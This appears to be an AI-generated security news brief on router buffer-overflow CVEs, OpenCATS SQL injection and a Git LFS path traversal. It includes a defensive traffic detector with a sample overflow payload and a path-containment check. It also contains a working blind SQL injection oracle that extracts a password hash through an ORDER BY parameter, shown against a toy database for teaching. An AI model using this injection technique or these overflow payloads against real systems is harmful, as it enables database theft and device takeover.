VYPR
AI Brief 2026-06-01 · generated May 31, 2026

What you need to know today.

Dozens of unpatched RCE flaws hit legacy SOHO routers from TRENDnet, Edimax, Tenda, and Totolink, while OpenCATS and Git LFS disclose SQL injection and path-traversal bugs.

TRENDnet TEW-432BRP: 15 Remote Flaws Disclosed, Product is End-of-Life. A batch of 15 stack-based buffer overflow vulnerabilities was disclosed in the TRENDnet TEW-432BRP router running firmware 3.10B20. The flaws span multiple functions in the /goform/ handler, including formWlanSetup (CVE-2026-10183), formSysCmd (CVE-2026-10181), formSetWlanEncrypt (CVE-2026-10179), formSetPassword (CVE-2026-10162), formResetStatistic (CVE-2026-10161), formSetEnableWizard (CVE-2026-10160), formSysLog (CVE-2026-10159), and formPortFw (CVE-2026-10158), all rated CVSS 8.8. Each is triggered by a crafted POST request to the web management interface whose oversized argument overruns a fixed-size stack buffer, yielding remote code execution. One caveat on the "unauthenticated" framing: a CVSS 3.x score of 8.8 with high confidentiality, integrity and availability impact implies either low-privilege access to that interface or a user-interaction step (an unauthenticated, no-interaction flaw of this shape scores 9.8), though factory-default credentials on a SOHO router make that a thin barrier. As Vypr Intelligence reported, the product is end-of-life with no patches forthcoming, leaving every deployed unit permanently exploitable. Organizations still running the TEW-432BRP should treat these devices as a critical risk and isolate or replace them immediately; at minimum, ensure the management interface is reachable neither from the WAN nor from untrusted LAN segments.

Edimax BR-6478AC: Seven Remote-Code-Execution Flaws Disclosed in 12-Hour Batch. Seven buffer overflow vulnerabilities were published for the Edimax BR-6478AC router (firmware 1.23), all reachable through its POST request handler. The affected functions include formWanTcpipSetup (CVE-2026-10165), formUSBFolder (CVE-2026-10164), formUSBAccount (CVE-2026-10163), and formQoS (CVE-2026-10126), each rated CVSS 8.8, the same network vector with low-privilege access as the TRENDnet batch. An attacker overflows a stack buffer by supplying an oversized value for arguments such as pppUserName, ShareName, UserName, or selSSID, leading to remote code execution on the device. As Vypr Intelligence noted, seven distinct RCE vectors disclosed in a single day underscore the lack of security hardening in legacy SOHO routers. No patch has been announced; users should consider replacing the device, confirm that management is not exposed on the WAN, and restrict LAN-side access to the management interface to a trusted segment.

Tenda W12: Three Stack-Based Buffer Overflows in /bin/httpd. Three high-severity vulnerabilities (CVSS 8.8) were disclosed in the Tenda W12 router running firmware 3.0.0.7(4763). The flaws affect the functions cgiWifiMacFilterSet (CVE-2026-10191), cgiSysTimeInfoSet (CVE-2026-10189), and cgistaKickOff (CVE-2026-10188) within the /bin/httpd binary. Each can be exploited remotely by sending a crafted POST request with an oversized argument — wifiMacFilterSet.macList.mac, sec, or staMac respectively — causing a stack-based buffer overflow that yields remote code execution. No patch or mitigation guidance has been published. Given the device's exposure on internal networks, these flaws represent a credible pivot point for attackers who have already gained LAN access.

Totolink N300RH: Critical-Rated Web Interface Flaw. A critical vulnerability (CVSS 9.8) was identified in the Totolink N300RH router running firmware 6.1c.1353_B20190305 (the suffix suggests a March 2019 build). The issue resides in the setWiFiBasicConfig function of the wireless.so module within the web management interface (CVE-2026-10187). Manipulating the KeyS argument can lead to remote code execution without authentication, which is what separates this 9.8 from the 8.8 router flaws above. With a risk score of 0.64 (high) and no EPSS data yet, this is the highest-severity single CVE in today's window. Totolink has not released a patch; users should disable remote administration, keep the management interface off the WAN, and monitor for firmware updates.
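Every router item above has the same shape: a POST to a web-management handler whose argument is longer than the stack buffer it is copied into. The following is an added detection example, not vendor or Vypr code, that inspects a captured HTTP request and flags form parameters that are oversized, contain non-printable bytes, or carry one of the parameter names the items above identify as overflow sinks. The 128-byte threshold, the sample requests and the pairing of the TRENDnet /goform/ path with an Edimax parameter name are constructed for illustration; the Tenda and Totolink handler URLs are not given in the brief, so matching is on parameter content rather than path.

```python
# Added example (not vendor or Vypr code): flag POST requests to a SOHO
# router's web-management handlers that carry an oversized or binary-laden
# form parameter, the shape every router item above shares.
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Parameter names the items above name as overflow sinks.
KNOWN_SINKS = {
    "pppUserName", "ShareName", "UserName", "selSSID",       # Edimax BR-6478AC
    "wifiMacFilterSet.macList.mac", "sec", "staMac",         # Tenda W12
    "KeyS",                                                  # Totolink N300RH
}
# Assumed threshold: SSIDs, usernames, MAC lists and share names are far
# shorter than this; stack-smashing payloads are usually much longer.
MAX_PARAM_LEN = 128


@dataclass
class Finding:
    handler: str
    param: str
    length: int
    reasons: list


def parse_request(raw: bytes):
    """Minimal HTTP/1.x request parser: (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return method.decode("latin-1"), target.decode("latin-1"), headers, body


def inspect_request(raw: bytes) -> list:
    """Return one Finding per suspicious form parameter in a POST request."""
    method, target, headers, body = parse_request(raw)
    if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    handler = urlsplit(target).path.rsplit("/", 1)[-1]   # e.g. formWlanSetup
    findings = []
    # latin-1 keeps every percent-decoded byte as one character, so a NUL,
    # a NOP-sled byte or a little-endian address survives for inspection.
    for name, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True,
                                 encoding="latin-1"):
        reasons = []
        if len(value) > MAX_PARAM_LEN:
            reasons.append(f"length {len(value)} exceeds {MAX_PARAM_LEN}")
        if any(not 0x20 <= ord(c) <= 0x7E for c in value):
            reasons.append("non-printable bytes")
        if reasons and name in KNOWN_SINKS:
            reasons.append("parameter is a named overflow sink")
        if reasons:
            findings.append(Finding(handler, name, len(value), reasons))
    return findings


# Constructed sample traffic: the handler path is the TRENDnet /goform/ one
# above and the parameter name an Edimax sink; neither is from a real capture.
BENIGN_REQUEST = (
    b"POST /goform/formWlanSetup HTTP/1.1\r\n"
    b"Host: 192.168.10.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"selSSID=HomeNet&channel=6&apply=Apply"
)
SUSPECT_REQUEST = (
    b"POST /goform/formWlanSetup HTTP/1.1\r\n"
    b"Host: 192.168.10.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"selSSID=" + b"A" * 600 + b"%90%90%ef%be%ad%de&channel=6"
)

if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, SUSPECT_REQUEST):
        for f in inspect_request(raw):
            print(f"{f.handler}: {f.param} ({f.length} bytes): {', '.join(f.reasons)}")
```

Run over a pcap export or proxy log of management-interface traffic, the benign request produces no findings while the suspect one is reported once for selSSID with all three reasons. Length alone is a coarse signal; the non-printable check catches the address and NOP bytes that an overflow payload must carry, and the sink-name match is what turns a generic anomaly into a hit against the specific advisories.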

OpenCATS: Two SQL Injection Vulnerabilities in DataGrid Component. Two SQL injection flaws were disclosed in OpenCATS, the open-source applicant tracking system. CVE-2026-49489 (CVSS 8.5) allows authenticated attackers to extract database contents via the sortDirection parameter in the DataGrid component. CVE-2026-49490 (CVSS 8.1) targets the same DataGrid's filter handling, enabling SQL injection through crafted filters on the non-filterable Tags column in the Candidates DataGrid. Both affect OpenCATS through version 0.9.7.4. The sortDirection case is a reminder that prepared statements alone do not close this class of bug: a sort direction is SQL syntax rather than data, so it cannot be bound as a parameter and must instead be validated against a closed allowlist (ASC or DESC) before it reaches the query text. While authentication is required, the broad access these injections grant to applicant and recruitment data makes them attractive targets in HR-system intrusions. No patch has been announced.
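To show why an ORDER BY direction is injectable even though it is never quoted, here is an added illustration in Python against SQLite. It is not OpenCATS code and does not reproduce the DataGrid query; the table layout, the admin hash and the candidate names are constructed. The vulnerable builder splices sortDirection into the SQL text, and the attacker turns the ordering of the returned rows into a boolean oracle that leaks the admin password hash one hex digit at a time; the hardened builder accepts only the two keywords.

```python
# Added illustration (not OpenCATS code): a sort direction spliced into SQL
# by string formatting is injectable even though it is never quoted, and
# because ORDER BY keywords cannot be bound parameters, an allowlist is the fix.
import sqlite3

ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for an ATS database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE candidates (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO candidates (name) VALUES ('Alice'), ('Bob'), ('Carol');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users (username, password_hash)
            VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_sorted_names(conn, sort_direction: str) -> list:
    # Vulnerable pattern: the request parameter goes straight into the SQL text.
    sql = f"SELECT name FROM candidates ORDER BY name {sort_direction}"
    return [row[0] for row in conn.execute(sql)]


def hardened_sorted_names(conn, sort_direction: str) -> list:
    # Fix: a direction is syntax, not data, so it cannot be a bind parameter;
    # accept only the two keywords and reject everything else.
    direction = sort_direction.strip().upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"invalid sort direction: {sort_direction!r}")
    sql = f"SELECT name FROM candidates ORDER BY name {direction}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(guess: str) -> str:
    # Boolean oracle through ORDER BY: "name * 0" ties every row on the first
    # key, so the second key (name DESC when the guess is right, NULL for every
    # row otherwise) decides whether the list comes back reversed.
    return (
        f"* 0, CASE WHEN (SELECT substr(password_hash, 1, {len(guess)}) FROM users "
        f"WHERE username = 'admin') = '{guess}' THEN name END DESC, name ASC"
    )


def leak_hash_prefix(conn, length: int = 4, alphabet: str = "0123456789abcdef") -> str:
    """Recover the first `length` hex digits of the admin hash, one per round."""
    known = ""
    for _ in range(length):
        for ch in alphabet:
            rows = vulnerable_sorted_names(conn, oracle_payload(known + ch))
            if rows == sorted(rows, reverse=True):
                known += ch
                break
        else:
            raise RuntimeError("no character matched; oracle assumptions broken")
    return known


if __name__ == "__main__":
    db = setup_db()
    print("leaked via sortDirection:", leak_hash_prefix(db))
    try:
        hardened_sorted_names(db, oracle_payload("5"))
    except ValueError as exc:
        print("hardened query rejected:", exc)
```

The attacker never needs a quote character or a second statement: the injected text is a valid ORDER BY expression, and each request answers one yes/no question about a value in another table. That is the same extraction channel the CVE-2026-49489 description refers to, and it is why the hardened version refuses anything that is not literally ASC or DESC rather than trying to escape the input.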

Git LFS: Path Traversal via Malicious Repository Contents. A path traversal vulnerability (CVE-2025-26625) affects Git LFS versions 0.5.2 through 3.7.0. When a repository's working tree is populated with Git LFS objects, certain commands may write files outside the intended working directory, enabling an attacker who controls a repository's LFS objects to write arbitrary files on the cloning user's filesystem. This is a supply-chain style risk: a developer who clones a malicious repository could have files written to sensitive locations such as ~/.ssh/authorized_keys or system startup directories, and because the LFS smudge filter runs during checkout once git lfs install has configured it, a plain git clone is enough to trigger the write. The vulnerability has no EPSS score yet, but the attack vector, tricking a developer into cloning a booby-trapped repository, is well understood and easy to automate. Users should update to Git LFS 3.7.1 or later; git lfs version shows the installed release, and CI runners and developer images that bake in an older binary need the same update.
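The defensive check behind this class of bug is path containment: before writing a file whose name comes from repository contents, resolve where the write would actually land and refuse anything outside the working tree. The following is an added example in Python, not Git LFS code and not the fix shipped in 3.7.1; it rejects absolute paths, parent-directory segments, and the subtler case of a symlink already checked out inside the tree that points elsewhere. The temporary working tree, the planted symlink and the candidate paths are constructed for the demonstration, and the check uses POSIX path semantics.

```python
# Added example (not Git LFS code): the containment check a tool should run
# before writing a file whose path comes from repository contents, so that
# "../" segments, absolute paths and in-tree symlinks cannot land a write
# outside the working tree.
import os
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when an untrusted relative path would escape the working tree."""


def safe_write_path(worktree: Path, untrusted_rel: str) -> Path:
    """Return the absolute, symlink-resolved path for `untrusted_rel` under
    `worktree`, or raise UnsafePath. Uses POSIX path semantics."""
    root = worktree.resolve()
    rel = Path(untrusted_rel)
    if rel.is_absolute() or untrusted_rel.startswith(("/", "\\")):
        raise UnsafePath(f"absolute path rejected: {untrusted_rel!r}")
    if ".." in rel.parts:
        raise UnsafePath(f"parent traversal rejected: {untrusted_rel!r}")
    target = root / rel
    # Resolving the parent follows symlinks that already exist inside the
    # tree; a link pointing outside shows up here as a parent not under root.
    parent = target.parent.resolve()
    if parent != root and root not in parent.parents:
        raise UnsafePath(f"symlink escape rejected: {untrusted_rel!r}")
    final = parent / target.name
    if final.is_symlink():
        raise UnsafePath(f"refusing to write through symlink: {untrusted_rel!r}")
    return final


def demo() -> dict:
    """Build a constructed working tree with an escaping symlink and try
    several untrusted paths; returns {path: verdict}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        root, outside = base / "repo", base / "outside"
        root.mkdir()
        outside.mkdir()
        os.symlink(outside, root / "link")          # attacker-planted symlink
        for candidate in ("lfs/objects/abc123", "../outside/evil",
                          "/etc/passwd", "link/evil", "a/../../evil"):
            try:
                accepted = safe_write_path(root, candidate)
                results[candidate] = "accepted: " + str(accepted.relative_to(root.resolve()))
            except UnsafePath as exc:
                results[candidate] = "rejected: " + str(exc)
    return results


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{path:24} {verdict}")
```

The symlink case is the one naive implementations miss: a path with no ".." in it and no leading slash still escapes if an earlier commit checked out a link whose target lies outside the tree, which is why the check resolves the parent on disk rather than inspecting the string alone.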

Synthesized by Vypr AI